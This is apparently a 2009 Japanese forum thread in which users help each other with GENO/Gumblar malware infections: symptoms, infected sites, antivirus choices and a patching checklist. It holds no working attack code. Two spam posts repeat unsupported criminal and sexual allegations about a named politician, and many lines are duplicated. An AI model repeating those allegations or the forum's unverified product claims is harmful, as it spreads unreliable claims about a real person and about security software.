481 :192.168.0.774:2009/07/10(金) 01:05:02 ID:wORF7xaw0
WindowsXP Home SP3 \11,820 1's
482 :192.168.0.774:2009/07/10(金) 01:42:39 ID:35zxjN7l0
26 名前: シラネアオイ(アラバマ州)[sage] 投稿日:2009/07/09(木) 21:25:01.62 ID:9KONbv8B
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5
1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた
1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令
2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う
http://nagamochi.info/src/up21093.jpg
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5
1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた
1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令
2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う
http://nagamochi.info/src/up21093.jpg
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
483 :192.168.0.774:2009/07/10(金) 01:43:32 ID:35zxjN7l0
26 名前: シラネアオイ(アラバマ州)[sage] 投稿日:2009/07/09(木) 21:25:01.62 ID:9KONbv8B
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5
1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた
1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令
2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う
http://nagamochi.info/src/up21093.jpg
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
エスエスハニーこと東国原英夫知事、自由民主党総裁候補 >>1-5
1986年ビートたけし、たけし軍団と共に講談社を襲撃し、暴行罪で現行犯逮捕 有罪判決(執行猶予)
1998年児童福祉法違反並びに東京都の青少年健全育成条例 違反の容疑で事情聴取、18歳未満とは知らなかったで法的に罪を免れた
ここがヘンだよ日本人で警察官も制服脱げば、俺と同じ事みんなやってるんだよという主旨の発言を繰り返していた
1999年オフィス北野の忘年会で、北海ジャンジャンの側頭部を蹴り傷害容疑で書類送検 罰金の略式命令
2008年交際していた女性に避妊をしないで行為し妊娠したら堕ろせと手切れ金150万円払う
http://nagamochi.info/src/up21093.jpg
http://nagamochi.info/src/up21094.jpg
宮崎県の借金を100億円増加させちゃいましたが宮崎を土建化せんといかん!
道路があれば介護も福祉もいらんとです!
道路さえあれば年金問題も解決するとです!
道路さえあれば国の借金900兆円もどげんかなるとです
484 :192.168.0.774:2009/07/10(金) 02:46:43 ID:uLP/X9D10
485 :192.168.0.774:2009/07/10(金) 03:03:59 ID:zy8UayzW0
アドバイスありがとうございます。
CDrは部屋の奥底にあるので家族に見つけて
もらうのは難しいです。
8月に実家に帰るのでそれまで使用はやめます。
質問が二つあります。
1 ブルースクリーンしかでない今、データの復帰はできますか?
2 usbにいくつかフォルダを移しました。
ウィルスが移ってないかわかりますか?
CDrは部屋の奥底にあるので家族に見つけて
もらうのは難しいです。
8月に実家に帰るのでそれまで使用はやめます。
質問が二つあります。
1 ブルースクリーンしかでない今、データの復帰はできますか?
2 usbにいくつかフォルダを移しました。
ウィルスが移ってないかわかりますか?
487 :192.168.0.774:2009/07/10(金) 09:25:46 ID:DM8bUgbH0
感染したのがいわゆる「GENO」だと特定できてるなら
システムファイルごっそり移したとかじゃなけりゃ2は問題無いと思う
1はCDぶち込んで電源いれればクリーンインスコできると思う
システムファイルごっそり移したとかじゃなけりゃ2は問題無いと思う
1はCDぶち込んで電源いれればクリーンインスコできると思う
488 :192.168.0.774:2009/07/10(金) 10:33:00 ID:TH9/JGS90
外付けブートCDか、ブートUSBを持っておくべき。今回はいい時期。
489 :192.168.0.774:2009/07/10(金) 15:06:26 ID:uLP/X9D10
>>486
データの復帰はID:aAq3fgTNOがすごくがんばればおそらく可能だけど
何に感染してるかわからないのでデータが安全かどうかわからない
同様に何に感染してるか特定できないのでUSBメモリも安全かどうかわからない
Genoだと思ってても本当はどうかわからないし
ほかの何かにも感染してるかもしれないよね
ID:aAq3fgTNOのレスを見る限りはお金を払って業者に頼むか
あきらめるかの二択じゃないかと
ちなみにUSBメモリに感染するウイルスの場合、他のPCで使用することにより
感染を広げることもあります
どうせ自動起動しちゃうだろうし不用意に確認しようとするのは危ないよ
データの復帰はID:aAq3fgTNOがすごくがんばればおそらく可能だけど
何に感染してるかわからないのでデータが安全かどうかわからない
同様に何に感染してるか特定できないのでUSBメモリも安全かどうかわからない
Genoだと思ってても本当はどうかわからないし
ほかの何かにも感染してるかもしれないよね
ID:aAq3fgTNOのレスを見る限りはお金を払って業者に頼むか
あきらめるかの二択じゃないかと
ちなみにUSBメモリに感染するウイルスの場合、他のPCで使用することにより
感染を広げることもあります
どうせ自動起動しちゃうだろうし不用意に確認しようとするのは危ないよ
490 :192.168.0.774:2009/07/10(金) 15:34:14 ID:zy8UayzW0
>>486
クリーンインストールし、全ての設定が終わった上で、
ウィルス対策ソフトをインストールして、ソフトのバージョンおよびウィルスパターンを更新して、
自動再生を切ってからデバイスを差し込んで、ウィルス対策ソフトにUSBをスキャンさせる。
クリーンインストールし、全ての設定が終わった上で、
ウィルス対策ソフトをインストールして、ソフトのバージョンおよびウィルスパターンを更新して、
自動再生を切ってからデバイスを差し込んで、ウィルス対策ソフトにUSBをスキャンさせる。
491 :192.168.0.774:2009/07/12(日) 23:16:09 ID:C4vtbwjH0
伸びてるとおもったらこれか
こわい
こわい
先日はアドバイス沢山ありがとうございました。
実家からCDrを送ってもらい、パソコンに入れたのですが、
ようこそ→ブルースクリーン
でクリーンインストールできませんでした。
修理にださないと無理でしょうか?
実家からCDrを送ってもらい、パソコンに入れたのですが、
ようこそ→ブルースクリーン
でクリーンインストールできませんでした。
修理にださないと無理でしょうか?
493 :192.168.0.774:2009/07/16(木) 23:50:30 ID:+Jh03mtC0
とりあえずPC詳しい奴にみてもらえw ファンが腐ってるかもしれんぞ
494 :192.168.0.774:2009/07/17(金) 02:39:58 ID:aJGYHCxV0
495 :192.168.0.774:2009/07/22(水) 12:44:07 ID:9yC5JkR90
システムをクリーンインストールした後はどうしたらいいん?
サーバ内に設置したhtmlファイルなどは一旦全消しすんのかな?
サーバ内に設置したhtmlファイルなどは一旦全消しすんのかな?
496 :192.168.0.774:2009/07/22(水) 14:18:30 ID:PLKvcPQ00
497 :192.168.0.774:2009/07/23(木) 19:32:53 ID:Y39ARKpc0
そしてお前はこう言う
↓
↓
498 :192.168.0.774:2009/07/23(木) 19:51:31 ID:pgIxqnE50
逃げちゃダメだ。
499 :192.168.0.774:2009/07/23(木) 20:36:24 ID:PXRCXHeF0
逃げちゃダメだ。
500 :192.168.0.774:2009/07/23(木) 22:21:53 ID:BgO9MD6O0
>>495
どういう問題が起こってるか理解できないなら閉鎖すべき
どういう問題が起こってるか理解できないなら閉鎖すべき
501 :192.168.0.774:2009/08/17(月) 14:57:37 ID:hbGGuN4M0
既出かもしれんが
ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。
しばらくはアクセスしない方がいい。
ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。
しばらくはアクセスしない方がいい。
502 :192.168.0.774:2009/08/17(月) 21:10:39 ID:zz5TreCn0
今更だけど、横浜市役所もやられてたのね。
ゾンビPCが市役所の中に残ってないといいんだけど・・・
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=city.yokohama.jp
ゾンビPCが市役所の中に残ってないといいんだけど・・・
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=city.yokohama.jp
503 :192.168.0.774:2009/08/17(月) 21:47:46 ID:ZC/t7WDI0
504 :192.168.0.774:2009/08/18(火) 15:07:14 ID:yHZM8N0b0
何気なくCCCクリーナーやってみたら
JS_GUMBLAR.ERKが検出された。ぐぐってもほとんど情報なし。
つか5月にGENOに感染してリカバリしたってのに。
その時はとにかくまとめwikiにある症状とドンピシャだったんだけど、
今回はなんか重いな、と時々CPUが100になってすぐ戻る。位の症状だった。
ノートン先生は検出せず。
やたらとトロイアタックが来てたのはそういうわけだったのか?
CCCのログ見ると検出された場所が
C:\Documents and Settings\○○○○\My Documents\katjusha\kakikomi.txt [JS_GUMBLAR.ERK]
なんでこんなとこが感染??(↑[ ]内は検出されたウィルス)
JS_GUMBLAR.ERKが検出された。ぐぐってもほとんど情報なし。
つか5月にGENOに感染してリカバリしたってのに。
その時はとにかくまとめwikiにある症状とドンピシャだったんだけど、
今回はなんか重いな、と時々CPUが100になってすぐ戻る。位の症状だった。
ノートン先生は検出せず。
やたらとトロイアタックが来てたのはそういうわけだったのか?
CCCのログ見ると検出された場所が
C:\Documents and Settings\○○○○\My Documents\katjusha\kakikomi.txt [JS_GUMBLAR.ERK]
なんでこんなとこが感染??(↑[ ]内は検出されたウィルス)
505 :192.168.0.774:2009/08/18(火) 15:16:58 ID:0i2srOIl0
506 :192.168.0.774:2009/08/18(火) 16:42:27 ID:l+rBKTqS0
>>504
CCCクリーナーについてkwsk
CCCクリーナーについてkwsk
507 :192.168.0.774:2009/08/18(火) 16:51:32 ID:RLJ3E0Kh0
508 :192.168.0.774:2009/08/18(火) 20:18:26 ID:dL5Wim8Q0
>>504
おまえ過去にGENO関連スクリプトをどっかのスレに貼りやがっただろ
おまえ過去にGENO関連スクリプトをどっかのスレに貼りやがっただろ
509 :192.168.0.774:2009/08/18(火) 20:19:09 ID:dL5Wim8Q0
日本語でおkだった
>>508
そんなことしてないよ〜
GENOでリカバリして以来、かちゅ〜しゃ入れたものの
ほとんど起動してなかったし書き込みも1、2回程度。
しかもそれも既女板だし。
ログ見てみたけど該当するJSから始まるウィルス名はなし。
だからkakikomi.txtから検出されたのが???なわけ。
そんなことしてないよ〜
GENOでリカバリして以来、かちゅ〜しゃ入れたものの
ほとんど起動してなかったし書き込みも1、2回程度。
しかもそれも既女板だし。
ログ見てみたけど該当するJSから始まるウィルス名はなし。
だからkakikomi.txtから検出されたのが???なわけ。
511 :192.168.0.774:2009/08/19(水) 16:00:06 ID:8YMbZHjT0
514 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/08/19(水) 15:49:34
とあるブログにウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけどウイルスバスターって意外と凄いと思った
とあるブログにウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけどウイルスバスターって意外と凄いと思った
512 :192.168.0.774:2009/08/20(木) 05:00:33 ID:kk6VBHkM0
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=nii.ac.jp
> Google が最後にこのサイトを巡回したのは2009-08-19で、
> このサイトで不審なコンテンツが最後に検出されたのは2009-08-19です。
国立情報学研究所はちゃんとGENOの駆除を済ませたんだろうか?
> Google が最後にこのサイトを巡回したのは2009-08-19で、
> このサイトで不審なコンテンツが最後に検出されたのは2009-08-19です。
国立情報学研究所はちゃんとGENOの駆除を済ませたんだろうか?
513 :192.168.0.774:2009/08/20(木) 11:02:09 ID:0pZFhpsy0
変なものは入ってなく見えるけどなあ
そこの子サイトよく使うんで、会社のPCもうちのPCも一応チェックしとくか
そこの子サイトよく使うんで、会社のPCもうちのPCも一応チェックしとくか
514 :192.168.0.774:2009/08/20(木) 13:01:02 ID:kk6VBHkM0
「nii.ac.jp」から絞り込んでみた。
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=wwwsoc.nii.ac.jp
> このサイトで過去 90 日間に Google がテストした 1030 ページのうち
> 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
> インストールされていたことが判明しました。
感染歴があるのは「wwwsoc.nii.ac.jp」だけかな?
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=wwwsoc.nii.ac.jp
> このサイトで過去 90 日間に Google がテストした 1030 ページのうち
> 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
> インストールされていたことが判明しました。
感染歴があるのは「wwwsoc.nii.ac.jp」だけかな?
515 :192.168.0.774:2009/08/20(木) 14:00:22 ID:RCyIYJ870
>>514
そのアドレスだと下位を各学会が使ってたりするからなあ
そのアドレスだと下位を各学会が使ってたりするからなあ
516 :192.168.0.774:2009/08/22(土) 09:37:06 ID:jhIYmbtr0
>>504
ウェブ改ざんウイルス「JS_GUMBLAR.ERK」が初登場2位 - トレンド週間ランキング
ttp://www.security-next.com/011035.html
で、バスターのパターンファイル追加の該当リスト(2009/8/9)
ttp://matcha139.hiemalis.org/~isamik/ptn/6.351.00.txt
バスターのパターンファイルへJS_GUMBLAR.ERKが追加されたのが2009/8/9っぽいから、
単に今まで検出できなかったのが、今になってやっと検出できるようになっただけの希ガス
ウェブ改ざんウイルス「JS_GUMBLAR.ERK」が初登場2位 - トレンド週間ランキング
ttp://www.security-next.com/011035.html
で、バスターのパターンファイル追加の該当リスト(2009/8/9)
ttp://matcha139.hiemalis.org/~isamik/ptn/6.351.00.txt
バスターのパターンファイルへJS_GUMBLAR.ERKが追加されたのが2009/8/9っぽいから、
単に今まで検出できなかったのが、今になってやっと検出できるようになっただけの希ガス
517 :192.168.0.774:2009/08/22(土) 12:33:21 ID:B5xgqliz0
1ヶ月ぶりにGENOの感染確認してみたら
sqlsodbc.chmのボリュームが2,894,207 バイトになってた・・・
これ感染してるんだよね・・・やべえ・・・
sqlsodbc.chmのボリュームが2,894,207 バイトになってた・・・
これ感染してるんだよね・・・やべえ・・・
518 :192.168.0.774:2009/08/22(土) 12:52:46 ID:rMzmO16b0
いまさら感染?
ブラウザの種類とかブラウザの設定とかウイルス対策ソフトとかどうしてたの?
ブラウザの種類とかブラウザの設定とかウイルス対策ソフトとかどうしてたの?
519 :192.168.0.774:2009/08/22(土) 22:10:42 ID:jhIYmbtr0
>>517
sqlsodbc.chmは盗聴のログって話だから、それだけ肥大化しているってことは
かなり色々と盗られたんじゃないかって気がする。
とりあえず、ご愁傷様としか。再インストールしてパスワード全部変えた方が良いでしょうね。
どこのセキュリティソフトを使っていたかわかりませんけど、余裕があるなら
シマンテック等のオンラインスキャンをして、何に感染していたか確認しておくのも、
今後のためには良いかも。
sqlsodbc.chmは盗聴のログって話だから、それだけ肥大化しているってことは
かなり色々と盗られたんじゃないかって気がする。
とりあえず、ご愁傷様としか。再インストールしてパスワード全部変えた方が良いでしょうね。
どこのセキュリティソフトを使っていたかわかりませんけど、余裕があるなら
シマンテック等のオンラインスキャンをして、何に感染していたか確認しておくのも、
今後のためには良いかも。
520 :192.168.0.774:2009/08/22(土) 23:34:12 ID:B5xgqliz0
ごめんーーーー違ったファイルみてたわ・・・・
ちゃんと正常だった
今月の頭にウィルスバスターの使用期間が切れて後で買えばいいかって思ってて
今までセキュリティなしだったんだよね
・・・セキュリティソフトやっぱ買ったほうがいいね
ちゃんと正常だった
今月の頭にウィルスバスターの使用期間が切れて後で買えばいいかって思ってて
今までセキュリティなしだったんだよね
・・・セキュリティソフトやっぱ買ったほうがいいね
521 :192.168.0.774:2009/08/22(土) 23:59:52 ID:jhIYmbtr0
>>520
や、正常だったようで、それは何より。
んでも、今使ってるのが期限切れしてるんなら、とりあえず適当な会社の体験版入れてセキュリティを維持するか、
もしくはフリーのでも良いから何か入れておいた方が良いよ。 体験版でも、1ヶ月は市販品と同じ最新状態維持できるし。
※ ただ、KINGとかZEROは避けた方が無難。フリーより検出率悪いから、それら入れるくらいならフリー使った方が良い。
あと、個人的には、最近バスターはパターンファイルの作成遅れが多くなってきたんで、これも避けた方が良いかも。
(>516みたいな話ね。ウチの会社バスター使ってるんで、ちょっと頑張って欲しいところではある。)
や、正常だったようで、それは何より。
んでも、今使ってるのが期限切れしてるんなら、とりあえず適当な会社の体験版入れてセキュリティを維持するか、
もしくはフリーのでも良いから何か入れておいた方が良いよ。 体験版でも、1ヶ月は市販品と同じ最新状態維持できるし。
※ ただ、KINGとかZEROは避けた方が無難。フリーより検出率悪いから、それら入れるくらいならフリー使った方が良い。
あと、個人的には、最近バスターはパターンファイルの作成遅れが多くなってきたんで、これも避けた方が良いかも。
(>516みたいな話ね。ウチの会社バスター使ってるんで、ちょっと頑張って欲しいところではある。)
522 :192.168.0.774:2009/08/27(木) 16:01:29 ID:wRk6Vuyp0
avast か AVG か...
avast使ってるけどどうもこのごろ心配だなあ
あとファイアウォールもいるけど
COMODO ,Outpost, Online Armor, PC Toolsがあるけど
PC Toolsがわかりやすいらしいというのを見た記憶がある。
COMODOは強力だが使いづらい。
avast使ってるけどどうもこのごろ心配だなあ
あとファイアウォールもいるけど
COMODO ,Outpost, Online Armor, PC Toolsがあるけど
PC Toolsがわかりやすいらしいというのを見た記憶がある。
COMODOは強力だが使いづらい。
523 :192.168.0.774:2009/09/20(日) 14:33:09 ID:urdUUYmlO
PC初心者です、教えてください。
どうやら感染していたようなのですが、
どういった被害がありますか?
保存していたファイル等が流出してしまったりするのでしょうか?
どうやら感染していたようなのですが、
どういった被害がありますか?
保存していたファイル等が流出してしまったりするのでしょうか?
524 :192.168.0.774:2009/09/20(日) 18:21:10 ID:qQSKk28C0
>>523
tp://www31.atwiki.jp/doujin_vinfo/
tp://www31.atwiki.jp/doujin_vinfo/
525 :192.168.0.774:2009/10/05(月) 20:40:47 ID:THEkkja60
wakatta
526 :192.168.0.774:2009/10/18(日) 23:16:07 ID:YIA/Ffw80
再始動した模様なのでage
http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
感染したまま放置されてたサイトや、
対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・
http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
感染したまま放置されてたサイトや、
対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・
527 :192.168.0.774:2009/10/18(日) 23:49:21 ID:3V7/xmbJ0
なんと
528 :192.168.0.774:2009/10/19(月) 11:24:25 ID:hqU1jDcR0
セキュ板より転載
366 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/10/19(月) 10:55:17
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html
zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。
366 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/10/19(月) 10:55:17
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html
zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。
529 :192.168.0.774:2009/10/19(月) 21:56:32 ID:SXUexp960
うへー怖いな・・・
530 :192.168.0.774:2009/10/19(月) 22:53:05 ID:t5PH3W/d0
これは流行りそうだな
まさに、gumblar comes back!
まさに、gumblar comes back!
531 :192.168.0.774:2009/10/21(水) 04:07:51 ID:BsxJ0MOv0
Google SafeBrowsingで、適当にmartuzスクリプト放置サイトを
拾ってみたら・・・・
martuzスクリプトの直後に
NewGumblarのスクリプト(<script src=〜.php ></script>)が追加されてた。
こりゃ同一犯なんだろうねえ・・・・
拾ってみたら・・・・
martuzスクリプトの直後に
NewGumblarのスクリプト(<script src=〜.php ></script>)が追加されてた。
こりゃ同一犯なんだろうねえ・・・・
532 :192.168.0.774:2009/10/22(木) 13:40:42 ID:9iMdmyQM0
Genoウイルス(Gumblar)検出状況
http://slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。
http://slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。
533 :192.168.0.774:2009/10/22(木) 15:45:05 ID:WyqDsNKh0
http://pc12.2ch.net/test/read.cgi/win/1255620129/140
Windowsが起動できない、(マウスは動くが画面真っ暗でwindowsが起動しない)
ってトラブルが出てて、自動更新失敗によるレジストリ破損と見られてるけど、
実はGENOなのか?
http://pc11.2ch.net/test/read.cgi/sec/1244633881/251
Windowsが起動できない、(マウスは動くが画面真っ暗でwindowsが起動しない)
ってトラブルが出てて、自動更新失敗によるレジストリ破損と見られてるけど、
実はGENOなのか?
http://pc11.2ch.net/test/read.cgi/sec/1244633881/251
534 :192.168.0.774:2009/10/22(木) 17:00:27 ID:9iMdmyQM0
レジストリのdriverのなんたらとか
sqlなんたらchmのハッシュ調べればわかるんでね
sqlなんたらchmのハッシュ調べればわかるんでね
535 :192.168.0.774:2009/10/23(金) 22:55:35 ID:epXZwyKF0
>>533
これじゃね?
黒い画面にマウスカーソル (Win32/Daonol)
http://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
再起動後に、黒い画面 (またはログオンスクリーンの色) に、マウスカーソルのみが表示されてしまう・・・
これじゃね?
黒い画面にマウスカーソル (Win32/Daonol)
http://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
再起動後に、黒い画面 (またはログオンスクリーンの色) に、マウスカーソルのみが表示されてしまう・・・
536 :192.168.0.774:2009/10/24(土) 02:39:17 ID:5GUKVqGx0
【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認(09/10/23)
http://pc11.2ch.net/test/read.cgi/pcnews/1256299220/
GENOウイルスに類似したあらたな攻撃が発生
http://tsushima.2ch.net/test/read.cgi/news/1256287835/
http://pc11.2ch.net/test/read.cgi/pcnews/1256299220/
GENOウイルスに類似したあらたな攻撃が発生
http://tsushima.2ch.net/test/read.cgi/news/1256287835/
537 :192.168.0.774:2009/10/25(日) 00:04:06 ID:h/d9Job30
今回のGENOも感染してるか否かの確認方法は前回と同じでいいのか?
538 :192.168.0.774:2009/10/25(日) 11:40:55 ID:onz9X9EW0
いいんでね?
539 :192.168.0.774:2009/10/25(日) 17:57:44 ID:N2xTSqMh0
540 :192.168.0.774:2009/10/25(日) 20:20:23 ID:FaKoDDbI0
>>539
乙です。色々サイト見たけど、この状態からの復旧は相当難しそうですね。
結構Gumblar(GENO)に感染していて潜伏状態だったPC、多いのかな?
Freeのセキュリティソフト、選択肢増えてるんだから何か入れれば良いのにねぇ。(苦笑
MSEあたりなら、ノーガード派にも受け入れやすいんだろうか...
乙です。色々サイト見たけど、この状態からの復旧は相当難しそうですね。
結構Gumblar(GENO)に感染していて潜伏状態だったPC、多いのかな?
Freeのセキュリティソフト、選択肢増えてるんだから何か入れれば良いのにねぇ。(苦笑
MSEあたりなら、ノーガード派にも受け入れやすいんだろうか...
541 :192.168.0.774:2009/10/26(月) 06:16:57 ID:bOuJ+ruU0
俺の友人のXPも真っ黒黒助だ
avast入ってたのに
ろくに更新もしてないんだとは思うけど
なんかlsass.exeエラーは出てるけど真っ黒でカーソル動くだけ
再セットアップしてさらにスキャンしてあげました
avast入ってたのに
ろくに更新もしてないんだとは思うけど
なんかlsass.exeエラーは出てるけど真っ黒でカーソル動くだけ
再セットアップしてさらにスキャンしてあげました
542 :192.168.0.774:2009/10/26(月) 18:51:38 ID:iUCf4CzS0
今回も携帯からサイト見る分は大丈夫なのかな?
543 :192.168.0.774:2009/10/27(火) 08:26:45 ID:+mI19/Pp0
問題無いが、パケ代には注意
544 :192.168.0.774:2009/10/27(火) 20:26:11 ID:gldzFeMo0
AVGで自動アップデートできないのもGENOの症状でしょうか?
545 :192.168.0.774:2009/10/27(火) 23:45:38 ID:Tnfh4hrr0
違うだろ
AVGスレでどうぞ
AVGスレでどうぞ
546 :192.168.0.774:2009/10/28(水) 20:56:21 ID:ALDKpRa40
>544
AVGで自動アップデートできないのはGENOの感染した症状の一部です。
genoは進化していますよ。
**のアップデートでは対応できません。
AVGで自動アップデートできないのはGENOの感染した症状の一部です。
genoは進化していますよ。
**のアップデートでは対応できません。
547 :192.168.0.774:2009/10/28(水) 21:02:46 ID:ALDKpRa40
AVG 9は、カリカリ・ソフトです。
新型GENOにもまだ未対応です。
ttp://www.virustotal.com/analisis/d7a0ebf90c79ac3bd08dc1e431e0cbcdb01e4e0fbf4a7690b64a6c0ae7262c74-1256543614
新型GENOにもまだ未対応です。
ttp://www.virustotal.com/analisis/d7a0ebf90c79ac3bd08dc1e431e0cbcdb01e4e0fbf4a7690b64a6c0ae7262c74-1256543614
548 :192.168.0.774:2009/10/29(木) 01:16:39 ID:vNcQ1fvq0
しばらlく落ち着いてたと思ってたのに
549 :192.168.0.774:2009/11/05(木) 02:56:10 ID:6KQsgcnM0
Gumblar再々起動
550 :192.168.0.774:2009/11/05(木) 03:07:53 ID:Z0Xlitm00
551 :192.168.0.774:2009/11/27(金) 21:39:07 ID:+ILGL8bh0
ニフティのウィルスチェックしようとすると
カスペアドオンのインストール画面でブラウザが固まるんだが…
カスペアドオンのインストール画面でブラウザが固まるんだが…
552 :192.168.0.774:2009/12/01(火) 14:10:18 ID:kHQYcET/0
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
553 :192.168.0.774:2009/12/10(木) 14:31:03 ID:IsDGsV3gO
Flashのアップデート公開されたな
>552
変な荒らしが住み着いてるぞ、なんだこれ
>552
変な荒らしが住み着いてるぞ、なんだこれ
554 :192.168.0.774:2009/12/10(木) 14:34:02 ID:Bn4hH/xd0
はいはい
555 :192.168.0.774:2009/12/18(金) 15:15:12 ID:zuzqPmN80
うちのも黒い画面になるけど数回つけるとつく
ただ壷が使えなくなった
ただ壷が使えなくなった
556 :192.168.0.774:2009/12/25(金) 22:23:34 ID:QN6U8Z750
こいつはwindows7でも感染報告あるの?
557 :192.168.0.774:2009/12/26(土) 07:26:34 ID:xFVMWyO/0
あったね
558 :192.168.0.774:2009/12/27(日) 17:06:12 ID:mjUeSJohO
559 :192.168.0.774:2010/01/07(木) 16:51:36 ID:2C5Kv5XL0
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
